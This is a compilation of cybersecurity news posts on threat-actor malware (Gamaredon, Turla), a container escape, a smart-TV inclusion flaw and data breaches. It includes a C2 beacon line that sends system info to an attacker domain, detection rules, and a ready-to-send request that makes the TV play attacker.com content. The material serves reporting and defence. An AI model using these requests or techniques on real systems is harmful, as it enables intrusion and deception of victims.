If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – OilRig, Jason email hijacking tool)


The post OilRig’s Jason email hacking tool leaked online appeared first on Security Affairs.

A month later Gamaredon is still active in Eastern Europe

Gamaredon continues to target Ukraine, Yoroi-Cybaze ZLab spotted a new suspicious activity potentially linked to the popular APT group

Introduction

The Gamaredon attacks against Ukraine don’t seem to have stopped. A month after our last report, we spotted a new suspicious email potentially linked to the Gamaredon group. The group was first discovered by Symantec and TrendMicro in 2015, but evidence of its activities has been dated back to 2013. Recently, Gamaredon has been targeting the Ukrainian military and law enforcement sectors too, as officially stated by CERT-UA.

Cybaze-Yoroi ZLAB team dissected the artifact recovered from their latest attack to figure out evolution or changes in the threat actor TTPs.

Technical Analysis

Figure 1. Malicious e-mail 

The infection chain is composed of different stages of password-protected SFX (self-extracting) archives, each containing VBS or batch scripts.

At the final stage of this malicious chain, we found a customized version of UltraVNC, a well-known off-the-shelf tool for remote administration, modified by the group and configured to connect to its command and control infrastructure. Despite its apparent triviality, the Matryoshka of SFX archives reached a low detection rate, making it effective.

Stage 1

Hash: 5555a3292bc6b6e7cb61bc8748b21c475b560635d8b0cc9686b319736c1d828e
Threat: Gamaredon Pteranodon implant
Brief Description: SFX file
Ssdeep: 24576:PXwOrRsTyuURQFsVhIe74lpyevrM4vZxn6k1gQ Guo:PgwRAyuURQ2/1YpyeT7ok8

Table 1. Information about initial SFX file

The mail attachment is a RAR archive containing a folder named “suspected” in Ukrainian and a single suspicious file with the “.scr” extension. At first glance, it is possible to notice the PowerPoint icon associated with the file, which normally does not belong to .scr files.

Figure 2. Content of malicious e-mail
Figure 3. Low AV detection of SFX malware

The file has a very low detection rate on the VirusTotal platform: only four AV engines are able to identify it as malicious, and only one engine understands it may be associated with the Gamaredon implant.

After a quick analysis, the real nature of the .scr file emerges: it is a Self Extracting Archive containing all the files shown in Figure 4.

They are extracted into “%TEMP%\7ZipSfx.000\” and the first command to be executed is “15003.cmd”, which first checks for the presence of malware analysis tools. If it detects Wireshark or Procexp, it kills itself. Otherwise, it copies:

Figure 4. Content of SFX
  • the “11439” file to “%USERNAME%\winupd.exe”
  • the “28509” file to “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\winupd.lnk”, which points to the previous executable and grants persistence across machine reboots
  • the “20261” file to “%TEMP%\7ZipSfx.000\Document.docx”
Figure 5. Script content in  “15003.cmd” file

At the same time, the extracted document is shown in order to divert the user’s attention and let the infection continue unnoticed. This document, written in Ukrainian, contains information about a criminal charge.

Figure 6. Fake document to divert attention on malware execution
Figure 7. Execution of “winupd.exe” (SFX) and relative password (uyjqystgblfhs)

Exploring the LNK file, it is possible to see that it starts the “winupd.exe” file with a particular parameter: %USERPROFILE%\winupd.exe -puyjqystgblfhs. This indicates that the “winupd.exe” executable is another Self Extracting Archive, but this time it is password protected.

Stage 2

Hash: fd59b1a991df0a9abf75470aad6e2fcd67c070bfccde9b4304301bc4992f678e
Threat: Gamaredon Pteranodon implant
Brief Description: SFX file
Ssdeep: 24576:bGKUQ8Lj7S6Jr1ye4SM4vzxn3k1jQ GujR:biJr1yeNxJkro

Table 2. Information about second SFX file

When launched, it extracts its content into “%TEMP%\RarSFX0\”, then executes the “setup.vbs” script, which contains only two lines of code. So, the execution flow moves on to “1106.cmd”.

Figure 8. Content of “setup.vbs” script
Figure 9. Content of “%APPDATA%\Local\Temp\RarSFX0” after “winupd.exe” (SFX) extraction

The source code of “1106.cmd” is full of junk instructions. However, in the end it performs a simple action: it writes a new VBS script in “%APPDATA%\Microsoft\SystemCertificates\My\Certificates\”. This script tries to download another malicious file from “http://bitvers.ddns[.net/{USERNAME}/{DATE}/index.html”. Researching this server, we noticed that the associated records are continuously modified. Indeed, the attacker has changed the domain names many times in the latest period. Moreover, querying the services behind the latest associated DNS record, the host still responds with a “403 Forbidden” message, indicating the infrastructure may still be operative.

Figure 10. Information about C2 and relative DNS

The script creates a new scheduled task in order to periodically execute (every 20 minutes) the previous VBS script.

Figure 11. POST request sent to C2 with victim machine information

It also collects information about the victim’s system using the legitimate “systeminfo” Microsoft tool and sends it to the remote server through a POST request using the “MicrosoftCreate.exe” file, which is actually the legitimate “wget” utility. The response body contains a new executable file, named “jasfix.exe”, representing the next stage.

Stage 3

Hash: c479d82a010884a8fde0d9dcfdf92ba9b5f4125fac1d26a2e36549d8b6b4d205
Threat: Gamaredon Pteranodon implant
Brief Description: SFX file
Ssdeep: 24576:Gfxwgmyg5EOJ+IIpBz2GAROm560XVEC1Ng MdfaQbhUfEIg+m:GJpgIdPzeRBJVEC1CMd

Table 3. Information about third SFX file

After some research, we were able to retrieve the “jasfix.exe” file, the next stage of the infection chain. After downloading it, we noticed that it is another SFX archive containing other files.

Figure 12. Content of “jasfix.exe” (SFX) downloaded from the C2

The first file to be executed is “20387.cmd” that renames the “win.jpg” into “win.exe”, another password protected SFX.

Stage 4

Hash: 28eff088a729874a611ca4781a45b070b46302e494bc0dd53cbaf598da9a6773
Threat: Gamaredon Pteranodon implant
Brief Description: SFX file
Ssdeep: 24576:9GKUQ8vCTAaaJVssTk3OwO+vl+3yt6Xf IAR:9vaJes2Ocl7t9S

Table 4. Information about fourth SFX file

This latest SFX archive follows the typical pattern of the Gamaredon Matryoshka archives, where the “.cmd” file is designed to decrypt and run the next stage, this time using the string “gblfhs” as the password.

Figure 13. Script to rename “win.jpg” into “win.exe”, decrypt and run next stage
Figure 14. Content of “win.exe” (last SFX of infection)

However, the file named “win32.sys” is particularly interesting: it is actually a PE32 executable file. Exploring the “.rsrc” section of the PE32 executable, we noticed different “.class” files. Two of them are named “VncCanvas” and “VncViewer”. These files are part of a legitimate Remote Administration Tool (RAT) named UltraVNC, available at this link.

Figure 15. Content of “win32.sys”

The “win.exe” SFX archive contains other interesting files too: one of them is an “.ini” configuration file containing all the parameters and the password used by the UltraVNC tool.

Figure 16. Configuration file used by “win32.sys” (Custom ultraVNC)

Finally, the RAT tries to establish a connection to the “torrent-vnc[.ddns[.net” domain, which points to an endpoint reachable at 195.88.208.51, a VPS hosted by the Russian provider IPServer.

Figure 17. C2 and relative port used by RAT
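
The chain above leaves several host-level traces: the 7ZipSfx.000 staging folder, the winupd.exe launch with the -p password switch from the Startup LNK, the VBS dropped under SystemCertificates\My\Certificates, and the renamed wget beaconing to bitvers.ddns[.net. As an added example that is not part of the Yoroi/Cybaze analysis, the following Python turns those traces into detection rules and runs them over constructed process-creation events; the event format, the sample lines and the VBS file name are assumptions.

```python
import re
from typing import Dict, List

# Constructed process-creation events in a simplified key=value format
# (assumption: the fields mimic what Sysmon or an EDR would record).
# The paths, file names, the -p switch and the C2 host come from the report above;
# "update.vbs" is a placeholder, the report does not name the dropped script.
SAMPLE_EVENTS = [
    r'user=alice image=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c C:\Users\alice\AppData\Local\Temp\7ZipSfx.000\15003.cmd" parent=C:\Users\alice\Downloads\file.scr',
    r'user=alice image=C:\Users\alice\winupd.exe cmdline="C:\Users\alice\winupd.exe -puyjqystgblfhs" parent=C:\Windows\explorer.exe',
    r'user=alice image=C:\Windows\System32\wscript.exe cmdline="wscript.exe C:\Users\alice\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\update.vbs" parent=C:\Windows\System32\taskeng.exe',
    r'user=alice image=C:\Users\alice\AppData\Local\Temp\RarSFX0\MicrosoftCreate.exe cmdline="MicrosoftCreate.exe --post-file=sysinfo.txt http://bitvers.ddns.net/alice/20190604/index.html" parent=C:\Windows\System32\cmd.exe',
    r'user=bob image="C:\Program Files\7-Zip\7z.exe" cmdline="7z.exe x archive.7z" parent=C:\Windows\explorer.exe',
]

# key=value pairs; values containing spaces are double-quoted.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Each rule: (name, field it inspects, pattern). Patterns are case-insensitive because
# Windows paths are.
RULES = [
    # A numbered .cmd run out of a 7-Zip SFX temp folder. Benign SFX installers can hit
    # this too, so treat it as a staging indicator to correlate with the rules below.
    ("sfx_stage_script", "cmdline",
     re.compile(r'\\Temp\\7ZipSfx\.\d+\\\d+\.cmd', re.I)),
    # winupd.exe launched with the SFX password switch (-p<password>).
    ("winupd_password_switch", "cmdline",
     re.compile(r'\\winupd\.exe"?\s+-p\S+', re.I)),
    # A VBS script executed from the certificate store directory used as a drop location.
    ("vbs_in_certificates_dir", "cmdline",
     re.compile(r'\\SystemCertificates\\My\\Certificates\\[^\s"]+\.vbs', re.I)),
    # wget renamed to MicrosoftCreate.exe, or any process talking to the C2 host.
    ("renamed_wget_beacon", "cmdline",
     re.compile(r'MicrosoftCreate\.exe|bitvers\.ddns\.net', re.I)),
]


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value event line into a dict (quoted or unquoted values)."""
    return {key: (quoted or bare) for key, quoted, bare in FIELD_RE.findall(line)}


def match_rules(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules whose pattern matches the event's inspected field."""
    return [name for name, field, pattern in RULES if pattern.search(event.get(field, ""))]


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run every rule over every event; one alert per event that matched at least one rule."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        hits = match_rules(event)
        if hits:
            alerts.append({"user": event.get("user"), "image": event.get("image"), "rules": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert['user']}: {alert['image']} -> {', '.join(alert['rules'])}")
```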

Conclusion

This recent attack campaign shows that the Gamaredon operations are still ongoing and confirms the potential Russian interest in infiltrating the East European ecosystem, especially the Ukrainian one. The techniques and the infection patterns the group is using are extremely similar to the other attacks spotted in the past months of 2019, showing the Matryoshka structure of chained SFX archives, typical of their implant, but still effective and not easily detectable by several antivirus engines.

Also, digging into this infection chain, we noticed the return of third-party RATs as payload, an old Gamaredon habit that the custom-made Pterodo backdoor had replaced some time ago.

Acknowledgement: special thanks to @JAMESWT_MHT for info and samples.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

https://blog.yoroi.company/research/the-russian-shadow-in-eastern-europe-a-month-later/

Pierluigi Paganini

(SecurityAffairs – Gamaredon, state-sponsored hacking)

The post A month later Gamaredon is still active in Eastern Europe appeared first on Security Affairs.

macOS zero-day in Mojave could allow Synthetic Clicks attacks

A security expert found a flaw that could be exploited to bypass macOS security and privacy features by using synthetic clicks.

The popular white hat hacker Patrick Wardle, co-founder and chief research officer at Digita Security, discovered a vulnerability that could be exploited to bypass security warnings by performing ‘Synthetic Clicks’ on behalf of users without requiring their interaction.

In June, Apple introduced a core security feature in macOS that forces applications to request permission from users before accessing sensitive data or components on the system (i.e. the device camera, microphone, location data, photos, messages, and browsing history).

Wardle disclosed the issue over the weekend during the meeting arranged by his company.

Wardle explained that a “subtle code-signing issue” in macOS could allow the hack of any trusted application to generate synthetic clicks, bypassing the core security feature introduced in 2018. Malware developers and hackers might use synthetic mouse-click attacks to emulate human behavior in approving security warnings.

The attack could be triggered by an attacker with local access to the device when the screen is dimmed, this means that it could be very difficult to spot.

According to Wardle, no special privileges are required to carry out the attack.

The attack involves the Transparency, Consent, and Control (TCC) system, which maintains databases for privacy control settings. The system also includes a compatibility database, stored in AllowApplicationsList.plist. This database is used to manage access to protected functions for specific versions of apps with specific signatures; it works as a sort of whitelist.

Wardle explained that an attacker can modify one of the applications in the whitelist and execute it to generate synthetic clicks. An attacker can download a modified version of the targeted app and run it. Apple is not able to detect the changes to the targeted app due to a flaw in code validation checks.

synthetic clicks

Wardle discovered several issues in macOS that could be exploited to allow synthetic clicks; he publicly disclosed one in September 2018 and another at DefCon 2018.

The security updates released by Apple over time failed to completely address the issue, allowing the expert to launch synthetic click attacks. Wardle reported his discovery to Apple a few days ago; the company acknowledged the problem and is likely already working to address it.

While waiting for a fix, macOS users could install GamePlan, the endpoint protection product designed by Digita Security, which prevents synthetic clicks.



Pierluigi Paganini

(SecurityAffairs – Apple, zero-day)

The post macOS zero-day in Mojave could allow Synthetic Clicks attacks appeared first on Security Affairs.

Australian teenager hacked into Apple twice for a job

What can an Apple fan do to work for his favorite company? A teen opted to hack it twice.

A 17-year-old Australian teenager decided to attract the attention of the tech giant by gaining access to its mainframe with false credentials.

The teen was dreaming of a job at Apple and was convinced that his actions would mean much more than a static CV or an internship application.

Unfortunately, the teen was identified and he has been found guilty of hacking twice into Apple’s infrastructure in 2015 and 2017. 


“The boy, who is now 17, faced the Adelaide Youth Court and pleaded guilty to multiple computer hacking charges.” reported the Australian ABC website.

“The court heard he and another teenager from Melbourne hacked into the technology giant’s mainframe in December 2015 and then again in early 2017 and downloaded internal documents and data.”

The teenager is from Adelaide, Australia, and violated an Apple mainframe by creating false credentials, he was helped by another young hacker. The lawyer of the teen, Mark Twiggs, explained to the court that his client had no bad intentions and due to his young age he was not aware of the severe consequences.

“This offending started when my client was 13 years of age, a very young age,” said Twiggs.

“He had no idea about the seriousness of the offence and hoped that when it was discovered that he might gain employment at this company.
“He didn’t know this was going to lead to anything other than a job at the end of it, [this] happened in Europe, a similar person got caught and they ended up getting employed by the company.”

The good news is that Apple did not incur any financial or intellectual loss from the hack.

Magistrate David White only placed the teenager on a $500 bond to be of good behaviour for nine months.

“He is clearly someone who is a gifted individual when it comes to information technology, that being said, those who have this advantage of being gifted doesn’t give them the right to abuse that gift,” said the Magistrate.

“The manner in which the world functions is one that is heavily reliant on computer technology and those who unlawfully interfere with those systems can do enormous amounts of damage.”

Magistrate White urged the teenager to use his talent in a better way in the future and to avoid violating the law.



Pierluigi Paganini

(SecurityAffairs – Apple, hacking)

The post Australian teenager hacked into Apple twice for a job appeared first on Security Affairs.

Hack The Sea: Bridging the gap between hackers and the maritime sector

There are not a lot of researchers probing the security of the computer systems underpinning the maritime industry. The limitations that keep that number low are obvious: both the specialized knowledge and the equipment are difficult to come by. And, as Ken Munro of UK-based Pen Test Partners told us a year ago, not many people move from shipping into pentesting (and into information security in general). But things are looking up for those who are interested: … More

The post Hack The Sea: Bridging the gap between hackers and the maritime sector appeared first on Help Net Security.

Australian National University hit by huge data breach

Vice-chancellor says hack involved personal and payroll details going back 19 years

The Australian National University is in damage control after discovering a major data breach a fortnight ago in which a “significant” amount of staff and student information was accessed by a “sophisticated operator”.

In a message to staff and students, vice-chancellor Brian Schmidt said someone illegally accessed the university’s systems in late 2018.


The Guardian view on cybercrime: the law must be enforced | Editorial

Governments and police must take crime on the internet seriously. It is where we all live now

About half of all property crime in the developed world now takes place online. When so much of our lives, and almost all of our money, have been digitised, this is not surprising – but it has some surprising consequences. For one thing, the decline in reported property crimes trumpeted by successive British governments between 2005 and 2015 turns out to have been an illusion. Because banks were not required to report fraud to the police after 2005, they often didn’t. It would have made both banks and police look bad to have all that crime known and nothing done about it. The cost of the resulting ignorance was paid by the rest of government, and by the public, too, deprived of accurate and reliable knowledge. Since then, the total number of property crimes reported has risen from about 6m to 11m a year as the figures have taken computerised crime into account.

The indirect costs to society are very much higher than the hundreds of millions that individuals lose. One example is the proliferation of plagiarism software online, which developed an entire industry in poor, English-speaking countries like Kenya, serving idle or ignorant students in England and North America. The effort required by schools and universities to guard against such fraud has been considerable, and its cost entirely disproportionate to the gains made by the perpetrators.


Gaining Root Access to Host through rkt Container hack

Unpatched vulnerabilities affect the rkt container runtime that could be exploited by an attacker to escape the container and gain root access to the host. 

Security researcher Yuval Avrahami discovered several vulnerabilities in the rkt container runtime that could be exploited by an attacker to compromise the underlying host when a user executes the ‘rkt enter’ command into an attacker-controlled pod.

rkt (pronounced like a “rocket”) is a CLI for running application containers on Linux. rkt is designed to be secure, composable, and standards-based.

The basic unit of execution at runtime is a pod, which includes multiple containers running in a shared context.

The ‘rkt enter’ command allows users to execute binaries in a running container. The binaries are executed as root, with no seccomp filtering or cgroup isolation; the only restriction is namespaces.

Avrahami discovered that it is possible to escape the container by triggering the vulnerabilities.

“The ‘rkt enter’ command allows users to run a binary in a running container, and is the rkt equivalent of ‘docker exec’.” states the expert.

“Binaries from the container executed via ‘rkt enter’ run as root, with all capabilities, and with no seccomp filtering or cgroup isolation applied. They are only restricted by namespaces, which are not enough to prevent them from breaking out and compromising the host.”

Below is the list of the issues reported to Red Hat (which acquired CoreOS in mid-2018):

  • CVE-2019-10144: processes run with `rkt enter` are given all capabilities during stage 2
  • CVE-2019-10145: processes run with `rkt enter` do not have seccomp filtering during stage 2
  • CVE-2019-10147: processes run with `rkt enter` are not limited by cgroups during stage 2
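
A practitioner who wants to know whether a process inside a container is running under the three conditions just listed can read the fields Linux exposes in /proc: CapEff in /proc/<pid>/status for capabilities, the Seccomp field for filtering, and /proc/<pid>/cgroup for cgroup placement. The audit below is an added example, not code from Avrahami’s write-up or the rkt project; the CAP_SYS_ADMIN and CAP_MKNOD bit positions are the standard Linux values, and the two /proc samples are constructed.

```python
from typing import Dict, List

# Capability bit positions from linux/capability.h (standard values, not from the page).
CAP_SYS_ADMIN = 21   # required for mount(2)
CAP_MKNOD = 27       # required to create device nodes


def parse_status(text: str) -> Dict[str, str]:
    """Parse the 'Key:<tab>value' lines of /proc/<pid>/status into a dict."""
    fields = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


def cgroup_paths(text: str) -> List[str]:
    """Return the path part of each 'hierarchy:controllers:path' line of /proc/<pid>/cgroup."""
    return [line.split(":", 2)[2] for line in text.splitlines() if line.count(":") >= 2]


def audit(status_text: str, cgroup_text: str) -> Dict[str, bool]:
    """Report the restrictions (or lack of them) visible to the process itself."""
    status = parse_status(status_text)
    cap_eff = int(status.get("CapEff", "0"), 16)
    paths = cgroup_paths(cgroup_text)
    return {
        "cap_sys_admin": bool((cap_eff >> CAP_SYS_ADMIN) & 1),
        "cap_mknod": bool((cap_eff >> CAP_MKNOD) & 1),
        # Seccomp: 0 = disabled, 1 = strict, 2 = filter mode (what runtimes normally apply).
        "seccomp_filter": status.get("Seccomp", "0") == "2",
        # Every cgroup path equal to "/" means the process sits in the root cgroup,
        # i.e. no resource limits were applied to it.
        "in_root_cgroup": bool(paths) and all(p == "/" for p in paths),
    }


def matches_rkt_enter_conditions(report: Dict[str, bool]) -> bool:
    """True when neither capabilities nor seccomp would stop the mknod+mount escape described above."""
    return report["cap_sys_admin"] and report["cap_mknod"] and not report["seccomp_filter"]


def audit_self() -> Dict[str, bool]:
    """Run the audit on the calling process (Linux only)."""
    with open("/proc/self/status") as status_file, open("/proc/self/cgroup") as cgroup_file:
        return audit(status_file.read(), cgroup_file.read())


# Constructed samples: a process started by 'rkt enter' under the three CVEs
# (full capability set, no seccomp, root cgroup) next to a process in a container
# running with a default Docker-style capability set and seccomp profile.
RKT_ENTER_STATUS = "Name:\tbash\nPid:\t4242\nCapEff:\t0000003fffffffff\nSeccomp:\t0\n"
RKT_ENTER_CGROUP = "0::/\n"
RESTRICTED_STATUS = "Name:\tbash\nPid:\t4243\nCapEff:\t00000000a80425fb\nSeccomp:\t2\n"
RESTRICTED_CGROUP = "0::/system.slice/container-abc\n"

if __name__ == "__main__":
    for label, status, cgroup in (("rkt-enter-like", RKT_ENTER_STATUS, RKT_ENTER_CGROUP),
                                  ("restricted", RESTRICTED_STATUS, RESTRICTED_CGROUP)):
        report = audit(status, cgroup)
        print(label, report, "escape conditions present:", matches_rkt_enter_conditions(report))
```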

The researcher published a video PoC that shows the exploitation of the above vulnerabilities.

The attacker needs to have root access inside the container; then, when the user runs the ‘rkt enter’ command, he can overwrite binaries and libraries in the container to run his malicious code.

For example, an attacker can overwrite /bin/bash in the container, because it is the default binary executed if the user doesn’t specify another.

The attacker could also overwrite libc.so.6 in the container, which is likely to be loaded by processes spawned with ‘rkt enter’. Using the gcc constructor attribute, the code runs whenever the modified libc library is loaded by a process.

“Once an attacker is running in the context of a container process spawned by ‘rkt enter’, he can escape the container and gain root access on the host with relative ease, as he runs with all capabilities, no seccomp filtering and without cgroup isolation,” continues the security researcher. 

As an example of exploitation, the expert describes an escape via mounting the host’s root directory.

Mounting the host root directory using the ‘mknod’ and ‘mount’ syscalls, would give the attacker root access on the host. The expert also published a video PoC for this attack.

Avrahami reported the flaws to Red Hat and CoreOS, but Red Hat revealed that it currently has no plan to address them. Red Hat asked the expert to share his findings with the user community.

“While investigating rkt I also discovered a way to create malicious ACI/OCI images that will compromise the host when run. Although this is certainly not ideal, malicious images are not a part of rkt’s threat model. Running images from an untrusted source is not aligned with rkt’s recommendations nor proper use,” concludes the researcher.

“As I stated at the start of this blog, if you are using rkt, avoid using the ‘rkt enter’ command as the vulnerabilities in it are currently unpatched. I also suggest considering alternative container runtimes which are more steadily maintained, such as Docker, podman or LXD.”


Pierluigi Paganini

(SecurityAffairs – rkt container, hacking)

The post Gaining Root Access to Host through rkt Container hack appeared first on Security Affairs.

Expert shows how to Hack a Supra Smart Cloud TV

Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication

Summary:
Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication via a /remote/media_control?action=setUri&uri=URI

Supra Smart Cloud TV

Technical Observation: 
We are abusing `openLiveURL()`, which allows a local attacker to broadcast video on the Supra Smart Cloud TV. I found this vulnerability initially by source code review; then crawling the application and reading every request helped me to trigger it.

Vulnerable code:

function openLiveTV(url)
{
    // Passes the caller-supplied URL straight to the media_control endpoint;
    // nothing checks where the stream comes from or who asked for it.
    $.get("/remote/media_control", {m_action:'setUri', m_uri:url, m_type:'video/*'},
        function (data, textStatus){
            if("success"==textStatus){
                alert(textStatus);
            }else
            {
                alert(textStatus);
            }
        });
}

Vulnerable request:

GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

To trigger the vulnerability you can send a crafted request to the URL,

http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

The above-mentioned URL takes an (.m3u8) playlist-based video. We can use `curl -v -X GET` to send such a request; typically this is an unauthenticated remote file inclusion. An attacker could broadcast any video without any authentication; in the worst case an attacker could leverage this vulnerability to broadcast a fake emergency message (Scary right?)

This is still unpatched because I didn’t find any way to contact the vendor.

The above video PoC shows a successful demonstration of this attack, where a Steve Jobs speech is suddenly replaced with the attacker’s fake “Emergency Alert Message”; this may make the end user panic.

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)

Original post at:

https://www.inputzero.io/2019/06/hacking-smart-tv.html


Pierluigi Paganini

(SecurityAffairs – hacking, Smart Cloud TV)

The post Expert shows how to Hack a Supra Smart Cloud TV appeared first on Security Affairs.

Threat actors abuse Microsoft Azure to Host Malware and C2 Servers

Microsoft Azure cloud services are being abused by threat actors to host malware and as command and control (C&C) servers.

Threat actors look with great interest at cloud services that could be abused for several malicious purposes, like storing malware or implementing command and control servers.

Now it seems to be Microsoft Azure’s turn: experts recently reported several attacks leveraging the platform to host tech-support scams and phishing templates.

microsoft azure

Security researchers already spotted some malware hosted on the Microsoft Azure platform.

Researchers at AppRiver observed attackers hosting malware on the Microsoft Azure platform; the bad news is that the malicious files were still online weeks after being reported, as of May 29.

“Now the attacks have escalated to malware being hosted on the Azure service. Not only is Azure hosting malware, it is also functioning as the command and control infrastructure for the malicious files” reads the analysis published by AppRiver.

“On May 11, 2019, malware researchers @JayTHL & @malwrhunterteam discovered the malicious software on Azure. It was reported to Microsoft on May 12 for abuse via ticket #SIR0552640.  However, the original malware (plus additional samples uploaded since) still resided on the Azure site as of May 29, 2019 – 17 days later.”

Experts pointed out that Azure is failing to detect the malware hosted on Microsoft’s servers.

“No service is infallible to being attacked or exploited. It’s evident that Azure is not currently detecting the malicious software residing on Microsoft’s servers. However, if a user attempts to download the executables, Windows Defender does detect the malicious files.”

In one case, a sample named searchfile.exe was uploaded to VirusTotal on April 26, 2019. Even if Windows Defender detects the malware, its presence on Azure is not currently blocked. Unfortunately, experts reported many other similar cases.

Experts believe that this trend will continue to grow: threat actors will abuse not only Microsoft Azure but also other cloud services (e.g. Google Drive, Dropbox, and Amazon) to avoid detection.



Pierluigi Paganini

(SecurityAffairs – Microsoft Azure, hacking)

The post Threat actors abuse Microsoft Azure to Host Malware and C2 Servers appeared first on Security Affairs.

Leicester City Football Club disclosed a card breach

Leicester City Football Club disclosed a card breach that affected its website, hackers stole payment card data, including card numbers and CVVs.

Leicester City Football Club revealed that hackers breached its online shop (https://shop.lcfc.com/) and stole the payment card data of customers who bought products there, including card numbers and CVVs.

leicester city

According to the club, the card breach affected some users between April 23 and May 4; the club has already notified the supporters whose details were compromised.

The club also informed the authorities and the Information Commissioner’s Office (ICO), and launched an immediate investigation.

“Upon discovery of the breach, the security of our retail platform was immediately restored and appropriate measures were taken to ensure the security of all other online assets.” reads the statement issued by the club.

Exposed data includes card number, name of card holder, expiry date and CVV.

“Technical investigations are still ongoing, but we can confirm that as a result of the incident your payment card information was compromised. This includes your card number, name of card holder, expiry date and CVV. We can confirm that your SecureCode was not compromised. That information is needed to attempt to conduct transactions using your account.” reads the email sent to the customers.

At the time of writing, there is no information about the attack or the way hackers breached the website of the English club, and it is also not clear how many supporters have been impacted.



Pierluigi Paganini

(SecurityAffairs – Leicester City Football Club, card breach)

The post Leicester City Football Club disclosed a card breach appeared first on Security Affairs.

Security Affairs newsletter Round 216 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.



Police seized Bestmixer, the mixing service washed at least $200 million in a year
Remarks on NATO and its approach to the cyber offensive
Sectigo says that most of certificates reported by Chronicle analysis were already revoked
BlueKeep scans observed from exclusively Tor exit nodes
Crooks leverage .htaccess injector on Joomla and WordPress sites for malicious redirects
First American Financial exposed 16 years worth of personal and financial documents
Hacker breached Perceptics, a US maker of license plate readers
APT10 is back with two new loaders and new versions of known payloads
DuckDuckGo Address Bar Spoofing
Internet scans found nearly one million systems vulnerable to BlueKeep
Shade Ransomware is very active outside of Russia and targets more English-speaking victims
Siemens Healthineers medical products vulnerable to Windows BlueKeep flaw
All Docker versions affected by an unpatched race condition issue
Google white hat hacker found code execution flaw in Notepad
HawkEye Keylogger is involved in attacks against business users
News aggregator Flipboard disclosed a data breach
TA505 is expanding its operations
Using Public Wi-Fi? Your data can be hacked easily! Here’s How…
Checkers double drive-thru restaurants chain discloses card breach
Convert Plus WordPress plugin flaw allows hackers to create Admin accounts
Emissary Panda APT group hit Government Organizations in the Middle East
Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers
VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs
0patch released micropatch for BearLPE Zero-Day flaw in Windows 10 Task Scheduler
HiddenWasp, a sophisticated Linux malware borrows from Mirai and Azazel
Microsoft warns for the second time of applying BlueKeep patch
Security expert shows how to bypass macOS Gatekeeper
The Pyramid Hotel Group data leak exposes 85GB of security logs of major hotel chains
Apple updates address SQLite, WebKit issues in iTunes and iCloud for Windows
Cryptojacking campaign uses Shodan to scan for Docker hosts to hack
GandCrab operators are shutting down their operations
Russian military plans to replace Windows with Astra Linux



Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 216 – News of the week appeared first on Security Affairs.

ESET analyzes Turla APT’s usage of weaponized PowerShell

Turla, the Russia-linked cyberespionage group, is weaponizing PowerShell scripts and is using them in attacks against EU diplomats.

Turla (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON), the Russia-linked APT group, is using weaponized PowerShell scripts in attacks aimed at EU diplomats.

Turla group has been active since at least 2007 targeting government organizations and private businesses.

The list of previously known victims is long and also includes the Swiss defense firm RUAG, the US Department of State, and the US Central Command.

Turla is back: in a recent wave of attacks the cyberspies targeted diplomatic entities in Eastern Europe.

“To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. This allows them to bypass detection that can trigger when a malicious executable is dropped on disk.” reads the report published by ESET.

The PowerShell scripts used by Turla in recent attacks allow direct, in-memory loading and execution of malicious executables and libraries avoiding detection.

Turla first used PowerShell in 2018; at the time, experts from Kaspersky Lab collected evidence of overlaps between the activity of the Russian APT groups Turla and Sofacy. 

Turla attacks

Kaspersky Lab said the APT was experimenting with PowerShell in-memory loads to bypass security protections; at the time the loader used by the cyberspies was based on the legitimate PoshSec-Mod software. However, due to bugs in the code it would often crash.

ESET believes that now the problems have been solved and the Turla threat actors leverage the PowerShell scripts to load an array of malware.

“The PowerShell scripts are not simple droppers; they persist on the system as they regularly load into memory only the embedded executables.” continues the report.

“We have seen Turla operators use two persistence methods:

  • A Windows Management Instrumentation (WMI) event subscription
  • Alteration of the PowerShell profile (profile.ps1 file).”

When the persistence is implemented through WMI, attackers create two WMI event filters and two WMI event consumers. The consumers are command lines launching base64-encoded PowerShell commands that load a PowerShell script stored in the Windows registry.

The second method used by the group consists of altering the PowerShell profile, a script that runs every time PowerShell starts.

In both cases the decryption of payloads stored in the registry is done using the 3DES algorithm. Once decrypted, a PowerShell reflective loader then comes into action.

“The payload decrypted at the previous step is a PowerShell reflective loader. It is based on the script Invoke-ReflectivePEInjection.ps1 from the same PowerSploit framework” reads the analysis.

“The executable is hardcoded in the script and is loaded directly into the memory of a randomly chosen process that is already running on the system,”

The attackers avoid injecting into processes that belong to security products, such as the Kaspersky anti-virus software.

